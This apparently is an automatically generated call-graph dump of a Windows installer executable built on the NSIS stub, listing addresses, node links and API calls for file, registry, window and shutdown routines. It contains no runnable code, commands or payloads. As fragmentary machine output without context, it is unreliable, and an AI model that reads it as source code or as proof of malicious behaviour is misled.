DefWindowProcA 5132->5134 5136 4010f3 5133->5136 5137 401179 5134->5137 5138 401073 CreateBrushIndirect FillRect DeleteObject 5136->5138 5139 4010fc 5136->5139 5138->5136 5140 401102 CreateFontIndirectA 5139->5140 5141 401167 EndPaint 5139->5141 5140->5141 5142 401112 6 API calls 5140->5142 5141->5137 5142->5141 5143 404100 lstrcpynA lstrlenA 5144 402602 5145 402892 5144->5145 5146 402609 5144->5146 5147 40260f FindClose 5146->5147 5147->5145 5155 401705 5156 4029fd 18 API calls 5155->5156 5157 40170c SearchPathA 5156->5157 5158 401727 5157->5158 5160 4027bd 5157->5160 5158->5160 5161 405d36 lstrcpynA 5158->5161 5161->5160 5162 100029c7 5163 100029df 5162->5163 5164 10001534 2 API calls 5163->5164 5165 100029fa 5164->5165 5166 40280a 5167 4029e0 18 API calls 5166->5167 5168 402810 5167->5168 5169 402841 5168->5169 5170 402663 5168->5170 5172 40281e 5168->5172 5169->5170 5171 405d58 18 API calls 5169->5171 5171->5170 5172->5170 5174 405c94 wsprintfA 5172->5174 5174->5170 5175 40218a 5176 4029fd 18 API calls 5175->5176 5177 402190 5176->5177 5178 4029fd 18 API calls 5177->5178 5179 402199 5178->5179 5180 4029fd 18 API calls 5179->5180 5181 4021a2 5180->5181 5182 40603a 2 API calls 5181->5182 5183 4021ab 5182->5183 5184 4021bc lstrlenA lstrlenA 5183->5184 5185 4021af 5183->5185 5187 40501f 25 API calls 5184->5187 5186 40501f 25 API calls 5185->5186 5189 4021b7 5185->5189 5186->5189 5188 4021f8 SHFileOperationA 5187->5188 5188->5185 5188->5189 5190 40220c 5191 402213 5190->5191 5195 402226 5190->5195 5192 405d58 18 API calls 5191->5192 5193 402220 5192->5193 5194 40554a MessageBoxIndirectA 5193->5194 5194->5195 5196 401490 5197 40501f 25 API calls 5196->5197 5198 401497 5197->5198 5199 406310 5201 406194 5199->5201 5200 406aff 5201->5200 5202 406215 GlobalFree 5201->5202 5203 40621e GlobalAlloc 5201->5203 5204 406295 GlobalAlloc 5201->5204 5205 40628c GlobalFree 5201->5205 5202->5203 5203->5200 5203->5201 5204->5200 5204->5201 5205->5204 4131 401b11 4132 401b62 4131->4132 4133 401b1e 4131->4133 4135 401b66 4132->4135 4136 401b8b GlobalAlloc 4132->4136 4134 401ba6 4133->4134 4139 401b35 4133->4139 4138 405d58 18 API calls 4134->4138 4144 402226 4134->4144 4135->4144 4152 405d36 lstrcpynA 4135->4152 4137 405d58 18 API calls 4136->4137 4137->4134 4140 402220 4138->4140 4150 405d36 lstrcpynA 4139->4150 4153 40554a 4140->4153 4143 401b78 GlobalFree 4143->4144 4146 401b44 4151 405d36 lstrcpynA 4146->4151 4148 401b53 4157 405d36 lstrcpynA 4148->4157 4150->4146 4151->4148 4152->4143 4154 40555f 4153->4154 4155 4055ab 4154->4155 4156 405573 MessageBoxIndirectA 4154->4156 4155->4144 4156->4155 4157->4144 5206 404f93 5207 404fa3 5206->5207 5208 404fb7 5206->5208 5209 404fa9 5207->5209 5218 405000 5207->5218 5210 404fbf IsWindowVisible 5208->5210 5216 404fd6 5208->5216 5212 404038 SendMessageA 5209->5212 5213 404fcc 5210->5213 5210->5218 5211 405005 CallWindowProcA 5215 404fb3 5211->5215 5212->5215 5219 4048ea SendMessageA 5213->5219 5216->5211 5224 40496a 5216->5224 5218->5211 5220 404949 SendMessageA 5219->5220 5221 40490d GetMessagePos ScreenToClient SendMessageA 5219->5221 5222 404941 5220->5222 5221->5222 5223 404946 5221->5223 5222->5216 5223->5220 5233 405d36 lstrcpynA 5224->5233 5226 40497d 5234 405c94 wsprintfA 5226->5234 5228 404987 5229 40140b 2 API calls 5228->5229 5230 404990 5229->5230 5235 405d36 lstrcpynA 5230->5235 5232 404997 5232->5218 5233->5226 5234->5228 5235->5232 4215 401595 4216 4029fd 18 API calls 4215->4216 4217 40159c SetFileAttributesA 4216->4217 4218 4015ae 4217->4218 5236 401c95 5237 4029e0 18 API calls 5236->5237 5238 401c9c 5237->5238 5239 4029e0 18 API calls 5238->5239 5240 401ca4 GetDlgItem 5239->5240 5241 4024cb 5240->5241 4242 403217 #17 SetErrorMode OleInitialize 4317 406061 GetModuleHandleA 4242->4317 4246 403287 GetCommandLineA 4322 405d36 lstrcpynA 4246->4322 4248 403299 GetModuleHandleA 4249 4032b0 4248->4249 4250 4057f1 CharNextA 4249->4250 4251 4032c4 CharNextA 4250->4251 4257 4032d4 4251->4257 4252 40339e 4253 4033b1 GetTempPathA 4252->4253 4323 4031e3 4253->4323 4255 4033c9 4258 403423 DeleteFileA 4255->4258 4259 4033cd GetWindowsDirectoryA lstrcatA 4255->4259 4256 4057f1 CharNextA 4256->4257 4257->4252 4257->4256 4262 4033a0 4257->4262 4331 402c79 GetTickCount GetModuleFileNameA 4258->4331 4261 4031e3 11 API calls 4259->4261 4264 4033e9 4261->4264 4415 405d36 lstrcpynA 4262->4415 4263 403437 4271 4057f1 CharNextA 4263->4271 4300 4034bd 4263->4300 4311 4034cd 4263->4311 4264->4258 4266 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4264->4266 4267 4031e3 11 API calls 4266->4267 4269 40341b 4267->4269 4269->4258 4269->4311 4273 403452 4271->4273 4280 403498 4273->4280 4281 4034fc lstrcatA lstrcmpiA 4273->4281 4274 4034e6 4277 40554a MessageBoxIndirectA 4274->4277 4275 4035da 4276 40367d ExitProcess 4275->4276 4279 406061 3 API calls 4275->4279 4282 4034f4 ExitProcess 4277->4282 4283 4035ed 4279->4283 4416 4058b4 4280->4416 4285 403518 CreateDirectoryA SetCurrentDirectoryA 4281->4285 4281->4311 4288 406061 3 API calls 4283->4288 4286 40353a 4285->4286 4287 40352f 4285->4287 4442 405d36 lstrcpynA 4286->4442 4441 405d36 lstrcpynA 4287->4441 4292 4035f6 4288->4292 4294 406061 3 API calls 4292->4294 4296 4035ff 4294->4296 4295 4034b2 4431 405d36 lstrcpynA 4295->4431 4299 40361d 4296->4299 4305 40360d GetCurrentProcess 4296->4305 4298 405d58 18 API calls 4301 403579 DeleteFileA 4298->4301 4302 406061 3 API calls 4299->4302 4361 403787 4300->4361 4303 403586 CopyFileA 4301->4303 4314 403548 4301->4314 4304 403654 4302->4304 4303->4314 4307 403669 ExitWindowsEx 4304->4307 4310 403676 4304->4310 4305->4299 4306 4035ce 4308 405bea 40 API calls 4306->4308 4307->4276 4307->4310 4308->4311 4448 40140b 4310->4448 4432 403695 4311->4432 4313 405d58 18 API calls 4313->4314 4314->4298 4314->4306 4314->4313 4315 4054e5 2 API calls 4314->4315 4316 4035ba CloseHandle 4314->4316 4443 405bea 4314->4443 4315->4314 4316->4314 4318 406088 GetProcAddress 4317->4318 4319 40607d LoadLibraryA 4317->4319 4320 40325c SHGetFileInfoA 4318->4320 4319->4318 4319->4320 4321 405d36 lstrcpynA 4320->4321 4321->4246 4322->4248 4324 405fa1 5 API calls 4323->4324 4326 4031ef 4324->4326 4325 4031f9 4325->4255 4326->4325 4451 4057c6 lstrlenA CharPrevA 4326->4451 4329 4059f6 2 API calls 4330 403215 4329->4330 4330->4255 4454 4059c7 GetFileAttributesA CreateFileA 4331->4454 4333 402cbc 4360 402cc9 4333->4360 4455 405d36 lstrcpynA 4333->4455 4335 402cdf 4456 40580d lstrlenA 4335->4456 4339 402cf0 GetFileSize 4340 402df1 4339->4340 4342 402d07 4339->4342 4461 402bda 4340->4461 4342->4340 4346 402e8c 4342->4346 4353 402bda 33 API calls 4342->4353 4342->4360 4492 4031b6 4342->4492 4345 402e34 GlobalAlloc 4350 402e4b 4345->4350 4347 402bda 33 API calls 4346->4347 4347->4360 4349 402e15 4352 4031b6 ReadFile 4349->4352 4351 4059f6 2 API calls 4350->4351 4354 402e5c CreateFileA 4351->4354 4355 402e20 4352->4355 4353->4342 4356 402e96 4354->4356 4354->4360 4355->4345 4355->4360 4476 4031cc SetFilePointer 4356->4476 4358 402ea4 4477 402f1f 4358->4477 4360->4263 4362 406061 3 API calls 4361->4362 4363 40379b 4362->4363 4364 4037a1 4363->4364 4365 4037b3 4363->4365 4538 405c94 wsprintfA 4364->4538 4366 405c1d 3 API calls 4365->4366 4367 4037de 4366->4367 4369 4037fc lstrcatA 4367->4369 4371 405c1d 3 API calls 4367->4371 4370 4037b1 4369->4370 4522 403a4c 4370->4522 4371->4369 4374 4058b4 18 API calls 4375 40382e 4374->4375 4376 4038b7 4375->4376 4378 405c1d 3 API calls 4375->4378 4377 4058b4 18 API calls 4376->4377 4379 4038bd 4377->4379 4385 40385a 4378->4385 4380 4038cd LoadImageA 4379->4380 4381 405d58 18 API calls 4379->4381 4382 403973 4380->4382 4383 4038f4 RegisterClassA 4380->4383 4381->4380 4387 40140b 2 API calls 4382->4387 4386 40392a SystemParametersInfoA CreateWindowExA 4383->4386 4414 40397d 4383->4414 4384 403876 lstrlenA 4389 403884 lstrcmpiA 4384->4389 4390 4038aa 4384->4390 4385->4376 4385->4384 4388 4057f1 CharNextA 4385->4388 4386->4382 4391 403979 4387->4391 4393 403874 4388->4393 4389->4390 4394 403894 GetFileAttributesA 4389->4394 4392 4057c6 3 API calls 4390->4392 4395 403a4c 19 API calls 4391->4395 4391->4414 4396 4038b0 4392->4396 4393->4384 4397 4038a0 4394->4397 4399 40398a 4395->4399 4539 405d36 lstrcpynA 4396->4539 4397->4390 4398 40580d 2 API calls 4397->4398 4398->4390 4401 403996 ShowWindow LoadLibraryA 4399->4401 4402 403a19 4399->4402 4403 4039b5 LoadLibraryA 4401->4403 4404 4039bc GetClassInfoA 4401->4404 4531 4050f1 OleInitialize 4402->4531 4403->4404 4406 4039d0 GetClassInfoA RegisterClassA 4404->4406 4407 4039e6 DialogBoxParamA 4404->4407 4406->4407 4411 40140b 2 API calls 4407->4411 4408 403a1f 4409 403a23 4408->4409 4410 403a3b 4408->4410 4413 40140b 2 API calls 4409->4413 4409->4414 4412 40140b 2 API calls 4410->4412 4411->4414 4412->4414 4413->4414 4414->4311 4415->4253 4548 405d36 lstrcpynA 4416->4548 4418 4058c5 4419 40585f 4 API calls 4418->4419 4420 4058cb 4419->4420 4421 4034a3 4420->4421 4422 405fa1 5 API calls 4420->4422 4421->4311 4430 405d36 lstrcpynA 4421->4430 4428 4058db 4422->4428 4423 405906 lstrlenA 4424 405911 4423->4424 4423->4428 4425 4057c6 3 API calls 4424->4425 4427 405916 GetFileAttributesA 4425->4427 4427->4421 4428->4421 4428->4423 4429 40580d 2 API calls 4428->4429 4549 40603a FindFirstFileA 4428->4549 4429->4423 4430->4295 4431->4300 4433 4036b0 4432->4433 4434 4036a6 CloseHandle 4432->4434 4435 4036c4 4433->4435 4436 4036ba CloseHandle 4433->4436 4434->4433 4552 4036f2 4435->4552 4436->4435 4441->4286 4442->4314 4444 406061 3 API calls 4443->4444 4445 405bf1 4444->4445 4447 405c12 4445->4447 4606 405a6e lstrcpyA 4445->4606 4447->4314 4449 401389 2 API calls 4448->4449 4450 401420 4449->4450 4450->4276 4452 4057e0 lstrcatA 4451->4452 4453 403201 CreateDirectoryA 4451->4453 4452->4453 4453->4329 4454->4333 4455->4335 4457 40581a 4456->4457 4458 402ce5 4457->4458 4459 40581f CharPrevA 4457->4459 4460 405d36 lstrcpynA 4458->4460 4459->4457 4459->4458 4460->4339 4462 402c00 4461->4462 4463 402be8 4461->4463 4466 402c10 GetTickCount 4462->4466 4467 402c08 4462->4467 4464 402bf1 DestroyWindow 4463->4464 4465 402bf8 4463->4465 4464->4465 4465->4345 4465->4360 4495 4031cc SetFilePointer 4465->4495 4466->4465 4469 402c1e 4466->4469 4468 40609a 2 API calls 4467->4468 4468->4465 4470 402c53 CreateDialogParamA ShowWindow 4469->4470 4471 402c26 4469->4471 4470->4465 4471->4465 4496 402bbe 4471->4496 4473 402c34 wsprintfA 4474 40501f 25 API calls 4473->4474 4475 402c51 4474->4475 4475->4465 4476->4358 4478 402f4b 4477->4478 4479 402f2f SetFilePointer 4477->4479 4499 40303a GetTickCount 4478->4499 4479->4478 4484 40303a 43 API calls 4485 402f82 4484->4485 4486 402ffc ReadFile 4485->4486 4490 402ff6 4485->4490 4491 402f92 4485->4491 4486->4490 4488 405a3f ReadFile 4488->4491 4489 402fc5 WriteFile 4489->4490 4489->4491 4490->4360 4491->4488 4491->4489 4491->4490 4493 405a3f ReadFile 4492->4493 4494 4031c9 4493->4494 4494->4342 4495->4349 4497 402bcd 4496->4497 4498 402bcf MulDiv 4496->4498 4497->4498 4498->4473 4500 4031a4 4499->4500 4501 403069 4499->4501 4502 402bda 33 API calls 4500->4502 4514 4031cc SetFilePointer 4501->4514 4509 402f52 4502->4509 4504 403074 SetFilePointer 4508 403099 4504->4508 4505 4031b6 ReadFile 4505->4508 4507 402bda 33 API calls 4507->4508 4508->4505 4508->4507 4508->4509 4510 40312e WriteFile 4508->4510 4511 403185 SetFilePointer 4508->4511 4515 406161 4508->4515 4509->4490 4512 405a3f ReadFile 4509->4512 4510->4508 4510->4509 4511->4500 4513 402f6b 4512->4513 4513->4484 4513->4490 4514->4504 4516 406186 4515->4516 4517 40618e 4515->4517 4516->4508 4517->4516 4518 406215 GlobalFree 4517->4518 4519 40621e GlobalAlloc 4517->4519 4520 406295 GlobalAlloc 4517->4520 4521 40628c GlobalFree 4517->4521 4518->4519 4519->4516 4519->4517 4520->4516 4520->4517 4521->4520 4523 403a60 4522->4523 4540 405c94 wsprintfA 4523->4540 4525 403ad1 4526 405d58 18 API calls 4525->4526 4527 403add SetWindowTextA 4526->4527 4528 40380c 4527->4528 4529 403af9 4527->4529 4528->4374 4529->4528 4530 405d58 18 API calls 4529->4530 4530->4529 4541 404038 4531->4541 4533 40513b 4534 404038 SendMessageA 4533->4534 4536 40514d OleUninitialize 4534->4536 4535 405114 4535->4533 4544 401389 4535->4544 4536->4408 4538->4370 4539->4376 4540->4525 4542 404050 4541->4542 4543 404041 SendMessageA 4541->4543 4542->4535 4543->4542 4546 401390 4544->4546 4545 4013fe 4545->4535 4546->4545 4547 4013cb MulDiv SendMessageA 4546->4547 4547->4546 4548->4418 4550 406050 FindClose 4549->4550 4551 40605b 4549->4551 4550->4551 4551->4428 4553 403700 4552->4553 4554 4036c9 4553->4554 4555 403705 FreeLibrary GlobalFree 4553->4555 4556 4055f6 4554->4556 4555->4554 4555->4555 4557 4058b4 18 API calls 4556->4557 4558 405616 4557->4558 4559 405635 4558->4559 4560 40561e DeleteFileA 4558->4560 4561 405763 4559->4561 4593 405d36 lstrcpynA 4559->4593 4589 4034d6 OleUninitialize 4560->4589 4566 40603a 2 API calls 4561->4566 4561->4589 4563 40565b 4564 405661 lstrcatA 4563->4564 4565 40566e 4563->4565 4567 405674 4564->4567 4568 40580d 2 API calls 4565->4568 4569 405787 4566->4569 4570 405682 lstrcatA 4567->4570 4571 40568d lstrlenA FindFirstFileA 4567->4571 4568->4567 4572 4057c6 3 API calls 4569->4572 4569->4589 4570->4571 4571->4561 4580 4056b1 4571->4580 4573 405791 4572->4573 4575 4055ae 5 API calls 4573->4575 4574 4057f1 CharNextA 4574->4580 4576 40579d 4575->4576 4577 4057a1 4576->4577 4578 4057b7 4576->4578 4584 40501f 25 API calls 4577->4584 4577->4589 4582 40501f 25 API calls 4578->4582 4579 405742 FindNextFileA 4579->4580 4583 40575a FindClose 4579->4583 4580->4574 4580->4579 4588 4055f6 64 API calls 4580->4588 4590 40501f 25 API calls 4580->4590 4591 40501f 25 API calls 4580->4591 4592 405bea 40 API calls 4580->4592 4594 405d36 lstrcpynA 4580->4594 4595 4055ae 4580->4595 4582->4589 4583->4561 4585 4057ae 4584->4585 4586 405bea 40 API calls 4585->4586 4586->4589 4588->4580 4589->4274 4589->4275 4590->4579 4591->4580 4592->4580 4593->4563 4594->4580 4603 4059a2 GetFileAttributesA 4595->4603 4598 4055d1 DeleteFileA 4601 4055d7 4598->4601 4599 4055c9 RemoveDirectoryA 4599->4601 4600 4055db 4600->4580 4601->4600 4602 4055e7 SetFileAttributesA 4601->4602 4602->4600 4604 4055ba 4603->4604 4605 4059b4 SetFileAttributesA 4603->4605 4604->4598 4604->4599 4604->4600 4605->4604 4607 405a97 4606->4607 4608 405abd GetShortPathNameA 4606->4608 4631 4059c7 GetFileAttributesA CreateFileA 4607->4631 4610 405ad2 4608->4610 4611 405be4 4608->4611 4610->4611 4613 405ada wsprintfA 4610->4613 4611->4447 4612 405aa1 CloseHandle GetShortPathNameA 4612->4611 4614 405ab5 4612->4614 4615 405d58 18 API calls 4613->4615 4614->4608 4614->4611 4616 405b02 4615->4616 4632 4059c7 GetFileAttributesA CreateFileA 4616->4632 4618 405b0f 4618->4611 4619 405b1e GetFileSize GlobalAlloc 4618->4619 4620 405b40 4619->4620 4621 405bdd CloseHandle 4619->4621 4622 405a3f ReadFile 4620->4622 4621->4611 4623 405b48 4622->4623 4623->4621 4633 40592c lstrlenA 4623->4633 4626 405b73 4628 40592c 4 API calls 4626->4628 4627 405b5f lstrcpyA 4629 405b81 4627->4629 4628->4629 4630 405bb8 SetFilePointer WriteFile GlobalFree 4629->4630 4630->4621 4631->4612 4632->4618 4634 40596d lstrlenA 4633->4634 4635 405975 4634->4635 4636 405946 lstrcmpiA 4634->4636 4635->4626 4635->4627 4636->4635 4637 405964 CharNextA 4636->4637 4637->4634 5242 10001058 5244 10001074 5242->5244 5243 100010dc 5244->5243 5245 100014bb GlobalFree 5244->5245 5246 10001091 5244->5246 5245->5246 5247 100014bb GlobalFree 5246->5247 5248 100010a1 5247->5248 5249 100010b1 5248->5249 5250 100010a8 GlobalSize 5248->5250 5251 100010b5 GlobalAlloc 5249->5251 5252 100010c6 5249->5252 5250->5249 5253 100014e2 3 API calls 5251->5253 5254 100010d1 GlobalFree 5252->5254 5253->5252 5254->5243 4656 403b19 4657 403b31 4656->4657 4658 403c6c 4656->4658 4657->4658 4659 403b3d 4657->4659 4660 403cbd 4658->4660 4661 403c7d GetDlgItem GetDlgItem 4658->4661 4663 403b48 SetWindowPos 4659->4663 4664 403b5b 4659->4664 4662 403d17 4660->4662 4673 401389 2 API calls 4660->4673 4726 403fec 4661->4726 4666 404038 SendMessageA 4662->4666 4687 403c67 4662->4687 4663->4664 4667 403b60 ShowWindow 4664->4667 4668 403b78 4664->4668 4698 403d29 4666->4698 4667->4668 4670 403b80 DestroyWindow 4668->4670 4671 403b9a 4668->4671 4669 403ca7 KiUserCallbackDispatcher 4672 40140b 2 API calls 4669->4672 4725 403f75 4670->4725 4674 403bb0 4671->4674 4675 403b9f SetWindowLongA 4671->4675 4672->4660 4676 403cef 4673->4676 4677 403c59 4674->4677 4678 403bbc GetDlgItem 4674->4678 4675->4687 4676->4662 4679 403cf3 SendMessageA 4676->4679 4735 404053 4677->4735 4682 403bec 4678->4682 4683 403bcf SendMessageA IsWindowEnabled 4678->4683 4679->4687 4680 40140b 2 API calls 4680->4698 4681 403f77 DestroyWindow EndDialog 4681->4725 4688 403bf9 4682->4688 4690 403c40 SendMessageA 4682->4690 4691 403c0c 4682->4691 4700 403bf1 4682->4700 4683->4682 4683->4687 4685 403fa6 ShowWindow 4685->4687 4686 405d58 18 API calls 4686->4698 4688->4690 4688->4700 4690->4677 4693 403c14 4691->4693 4694 403c29 4691->4694 4692 403c27 4692->4677 4697 40140b 2 API calls 4693->4697 4696 40140b 2 API calls 4694->4696 4695 403fec 19 API calls 4695->4698 4699 403c30 4696->4699 4697->4700 4698->4680 4698->4681 4698->4686 4698->4687 4698->4695 4701 403fec 19 API calls 4698->4701 4716 403eb7 DestroyWindow 4698->4716 4699->4677 4699->4700 4732 403fc5 4700->4732 4702 403da4 GetDlgItem 4701->4702 4703 403dc1 ShowWindow KiUserCallbackDispatcher 4702->4703 4704 403db9 4702->4704 4729 40400e KiUserCallbackDispatcher 4703->4729 4704->4703 4706 403deb EnableWindow 4709 403dff 4706->4709 4707 403e04 GetSystemMenu EnableMenuItem SendMessageA 4708 403e34 SendMessageA 4707->4708 4707->4709 4708->4709 4709->4707 4730 404021 SendMessageA 4709->4730 4731 405d36 lstrcpynA 4709->4731 4712 403e62 lstrlenA 4713 405d58 18 API calls 4712->4713 4714 403e73 SetWindowTextA 4713->4714 4715 401389 2 API calls 4714->4715 4715->4698 4717 403ed1 CreateDialogParamA 4716->4717 4716->4725 4718 403f04 4717->4718 4717->4725 4719 403fec 19 API calls 4718->4719 4720 403f0f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4719->4720 4721 401389 2 API calls 4720->4721 4722 403f55 4721->4722 4722->4687 4723 403f5d ShowWindow 4722->4723 4724 404038 SendMessageA 4723->4724 4724->4725 4725->4685 4725->4687 4727 405d58 18 API calls 4726->4727 4728 403ff7 SetDlgItemTextA 4727->4728 4728->4669 4729->4706 4730->4709 4731->4712 4733 403fd2 SendMessageA 4732->4733 4734 403fcc 4732->4734 4733->4692 4734->4733 4736 40406b GetWindowLongA 4735->4736 4746 4040f4 4735->4746 4737 40407c 4736->4737 4736->4746 4738 40408b GetSysColor 4737->4738 4739 40408e 4737->4739 4738->4739 4740 404094 SetTextColor 4739->4740 4741 40409e SetBkMode 4739->4741 4740->4741 4742 4040b6 GetSysColor 4741->4742 4743 4040bc 4741->4743 4742->4743 4744 4040c3 SetBkColor 4743->4744 4745 4040cd 4743->4745 4744->4745 4745->4746 4747 4040e0 DeleteObject 4745->4747 4748 4040e7 CreateBrushIndirect 4745->4748 4746->4687 4747->4748 4748->4746 4749 402519 4750 4029e0 18 API calls 4749->4750 4755 402523 4750->4755 4751 40258d 4752 405a3f ReadFile 4752->4755 4753 40258f 4758 405c94 wsprintfA 4753->4758 4755->4751 4755->4752 4755->4753 4756 40259f 4755->4756 4756->4751 4757 4025b5 SetFilePointer 4756->4757 4757->4751 4758->4751 4784 40231c 4785 402322 4784->4785 4786 4029fd 18 API calls 4785->4786 4787 402334 4786->4787 4788 4029fd 18 API calls 4787->4788 4789 40233e RegCreateKeyExA 4788->4789 4791 402368 4789->4791 4792 402663 4789->4792 4790 402380 4794 40238c 4790->4794 4796 4029e0 18 API calls 4790->4796 4791->4790 4793 4029fd 18 API calls 4791->4793 4795 402379 lstrlenA 4793->4795 4797 4023a7 RegSetValueExA 4794->4797 4798 402f1f 46 API calls 4794->4798 4795->4790 4796->4794 4799 4023bd RegCloseKey 4797->4799 4798->4797 4799->4792 5262 40261c 5263 402637 5262->5263 5264 40261f 5262->5264 5266 4027bd 5263->5266 5268 405d36 lstrcpynA 5263->5268 5265 40262c FindNextFileA 5264->5265 5265->5263 5268->5266 5269 40499c GetDlgItem GetDlgItem 5270 4049ee 7 API calls 5269->5270 5273 404c06 5269->5273 5271 404a91 DeleteObject 5270->5271 5272 404a84 SendMessageA 5270->5272 5274 404a9a 5271->5274 5272->5271 5288 4048ea 5 API calls 5273->5288 5292 404cea 5273->5292 5301 404c77 5273->5301 5275 404ad1 5274->5275 5277 405d58 18 API calls 5274->5277 5278 403fec 19 API calls 5275->5278 5276 404d96 5281 404da0 SendMessageA 5276->5281 5282 404da8 5276->5282 5283 404ab3 SendMessageA SendMessageA 5277->5283 5279 404ae5 5278->5279 5284 403fec 19 API calls 5279->5284 5280 404bf9 5286 404053 8 API calls 5280->5286 5281->5282 5293 404dc1 5282->5293 5294 404dba ImageList_Destroy 5282->5294 5298 404dd1 5282->5298 5283->5274 5302 404af3 5284->5302 5285 404d43 SendMessageA 5285->5280 5290 404d58 SendMessageA 5285->5290 5291 404f8c 5286->5291 5287 404cdc SendMessageA 5287->5292 5288->5301 5289 404f40 5289->5280 5299 404f52 ShowWindow GetDlgItem ShowWindow 5289->5299 5297 404d6b 5290->5297 5292->5276 5292->5280 5292->5285 5295 404dca GlobalFree 5293->5295 5293->5298 5294->5293 5295->5298 5296 404bc7 GetWindowLongA SetWindowLongA 5300 404be0 5296->5300 5307 404d7c SendMessageA 5297->5307 5298->5289 5312 40496a 4 API calls 5298->5312 5316 404e0c 5298->5316 5299->5280 5303 404be6 ShowWindow 5300->5303 5304 404bfe 5300->5304 5301->5287 5301->5292 5302->5296 5306 404b42 SendMessageA 5302->5306 5308 404bc1 5302->5308 5310 404b7e SendMessageA 5302->5310 5311 404b8f SendMessageA 5302->5311 5320 404021 SendMessageA 5303->5320 5321 404021 SendMessageA 5304->5321 5306->5302 5307->5276 5308->5296 5308->5300 5310->5302 5311->5302 5312->5316 5313 404f16 InvalidateRect 5313->5289 5314 404f2c 5313->5314 5322 4048a5 5314->5322 5315 404e3a SendMessageA 5319 404e50 5315->5319 5316->5315 5316->5319 5318 404ec4 SendMessageA SendMessageA 5318->5319 5319->5313 5319->5318 5320->5280 5321->5273 5325 4047e0 5322->5325 5324 4048ba 5324->5289 5326 4047f6 5325->5326 5327 405d58 18 API calls 5326->5327 5328 40485a 5327->5328 5329 405d58 18 API calls 5328->5329 5330 404865 5329->5330 5331 405d58 18 API calls 5330->5331 5332 40487b lstrlenA wsprintfA SetDlgItemTextA 5331->5332 5332->5324 5333 100010e0 5342 1000110e 5333->5342 5334 100011c4 GlobalFree 5335 100012ad 2 API calls 5335->5342 5336 100011c3 5336->5334 5337 10001155 GlobalAlloc 5337->5342 5338 100011ea GlobalFree 5338->5342 5339 10001266 2 API calls 5341 100011b1 GlobalFree 5339->5341 5340 100012d1 lstrcpyA 5340->5342 5341->5342 5342->5334 5342->5335 5342->5336 5342->5337 5342->5338 5342->5339 5342->5340 5342->5341 5343 4016a1 5344 4029fd 18 API calls 5343->5344 5345 4016a7 GetFullPathNameA 5344->5345 5346 4016df 5345->5346 5347 4016be 5345->5347 5348 402892 5346->5348 5349 4016f3 GetShortPathNameA 5346->5349 5347->5346 5350 40603a 2 API calls 5347->5350 5349->5348 5351 4016cf 5350->5351 5351->5346 5353 405d36 lstrcpynA 5351->5353 5353->5346 5354 10002162 5355 100021c0 5354->5355 5356 100021f6 5354->5356 5355->5356 5357 100021d2 GlobalAlloc 5355->5357 5357->5355 5358 401d26 GetDC GetDeviceCaps 5359 4029e0 18 API calls 5358->5359 5360 401d44 MulDiv ReleaseDC 5359->5360 5361 4029e0 18 API calls 5360->5361 5362 401d63 5361->5362 5363 405d58 18 API calls 5362->5363 5364 401d9c CreateFontIndirectA 5363->5364 5365 4024cb 5364->5365 5366 40442a 5367 404456 5366->5367 5368 404467 5366->5368 5427 40552e GetDlgItemTextA 5367->5427 5370 404473 GetDlgItem 5368->5370 5371 4044d2 5368->5371 5374 404487 5370->5374 5372 4045b6 5371->5372 5381 405d58 18 API calls 5371->5381 5425 40475f 5371->5425 5372->5425 5429 40552e GetDlgItemTextA 5372->5429 5373 404461 5375 405fa1 5 API calls 5373->5375 5376 40449b SetWindowTextA 5374->5376 5379 40585f 4 API calls 5374->5379 5375->5368 5380 403fec 19 API calls 5376->5380 5378 404053 8 API calls 5383 404773 5378->5383 5384 404491 5379->5384 5385 4044b7 5380->5385 5386 404546 SHBrowseForFolderA 5381->5386 5382 4045e6 5387 4058b4 18 API calls 5382->5387 5384->5376 5391 4057c6 3 API calls 5384->5391 5388 403fec 19 API calls 5385->5388 5386->5372 5389 40455e CoTaskMemFree 5386->5389 5390 4045ec 5387->5390 5392 4044c5 5388->5392 5393 4057c6 3 API calls 5389->5393 5430 405d36 lstrcpynA 5390->5430 5391->5376 5428 404021 SendMessageA 5392->5428 5395 40456b 5393->5395 5398 4045a2 SetDlgItemTextA 5395->5398 5402 405d58 18 API calls 5395->5402 5397 4044cb 5400 406061 3 API calls 5397->5400 5398->5372 5399 404603 5401 406061 3 API calls 5399->5401 5400->5371 5408 40460b 5401->5408 5404 40458a lstrcmpiA 5402->5404 5403 404645 5431 405d36 lstrcpynA 5403->5431 5404->5398 5405 40459b lstrcatA 5404->5405 5405->5398 5407 40464e 5409 40585f 4 API calls 5407->5409 5408->5403 5413 40580d 2 API calls 5408->5413 5414 40469d 5408->5414 5410 404654 GetDiskFreeSpaceA 5409->5410 5412 404676 MulDiv 5410->5412 5410->5414 5412->5414 5413->5408 5415 40470e 5414->5415 5417 4048a5 21 API calls 5414->5417 5416 404731 5415->5416 5418 40140b 2 API calls 5415->5418 5432 40400e KiUserCallbackDispatcher 5416->5432 5419 4046fb 5417->5419 5418->5416 5421 404710 SetDlgItemTextA 5419->5421 5422 404700 5419->5422 5421->5415 5423 4047e0 21 API calls 5422->5423 5423->5415 5424 40474d 5424->5425 5433 4043bf 5424->5433 5425->5378 5427->5373 5428->5397 5429->5382 5430->5399 5431->5407 5432->5424 5434 4043d2 SendMessageA 5433->5434 5435 4043cd 5433->5435 5434->5425 5435->5434 4098 40172c 4099 4029fd 18 API calls 4098->4099 4100 401733 4099->4100 4104 4059f6 4100->4104 4102 40173a 4103 4059f6 2 API calls 4102->4103 4103->4102 4105 405a01 GetTickCount GetTempFileNameA 4104->4105 4106 405a32 4105->4106 4107 405a2e 4105->4107 4106->4102 4107->4105 4107->4106 4108 401dac 4116 4029e0 4108->4116 4110 401db2 4111 4029e0 18 API calls 4110->4111 4112 401dbb 4111->4112 4113 401dc2 ShowWindow 4112->4113 4114 401dcd EnableWindow 4112->4114 4115 402892 4113->4115 4114->4115 4117 405d58 18 API calls 4116->4117 4118 4029f4 4117->4118 4118->4110 5436 401eac 5437 4029fd 18 API calls 5436->5437 5438 401eb3 5437->5438 5439 40603a 2 API calls 5438->5439 5440 401eb9 5439->5440 5442 401ecb 5440->5442 5443 405c94 wsprintfA 5440->5443 5443->5442 5444 40192d 5445 4029fd 18 API calls 5444->5445 5446 401934 lstrlenA 5445->5446 5447 4024cb 5446->5447 5448 4024af 5449 4029fd 18 API calls 5448->5449 5450 4024b6 5449->5450 5453 4059c7 GetFileAttributesA CreateFileA 5450->5453 5452 4024c2 5453->5452 5461 401cb0 5462 4029e0 18 API calls 5461->5462 5463 401cc0 